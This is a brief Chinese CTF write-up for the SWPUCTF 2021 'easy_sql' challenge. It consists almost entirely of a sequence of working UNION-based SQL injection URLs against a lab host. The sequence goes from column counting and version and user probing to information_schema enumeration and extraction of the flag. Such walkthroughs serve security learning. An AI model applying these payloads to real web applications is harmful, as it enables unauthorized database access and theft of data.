[SWPUCTF 2021 新生赛]easy_sql

http://node4.anna.nssctf.cn:28711/?wllm=1′

http://node4.anna.nssctf.cn:28711/?wllm=-1′ order by 4–+

http://node4.anna.nssctf.cn:28711/?wllm=-1′ union select 1,2,3–+

http://node4.anna.nssctf.cn:28711/?wllm=-1′ union select 1,database(),user()–+

http://node4.anna.nssctf.cn:28711/?wllm=-1′ union select 1,@@version,user()–+

MariaDB数据库管理系统是MySQL的一个分支,说明需要使用mysql语句注入

http://node4.anna.nssctf.cn:28711/?wllm=-1′ union select 1, 2,group_concat(table_name) from information_schema.tables where table_schema=’test_db’– +

http://node4.anna.nssctf.cn:28711/?wllm=-1′ union select 1, 2,group_concat(column_name) from information_schema.columns where table_name=’test_tb’– +

http://node4.anna.nssctf.cn:28711/?wllm=-1′ union select 1, 2,flag from test_tb– +

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注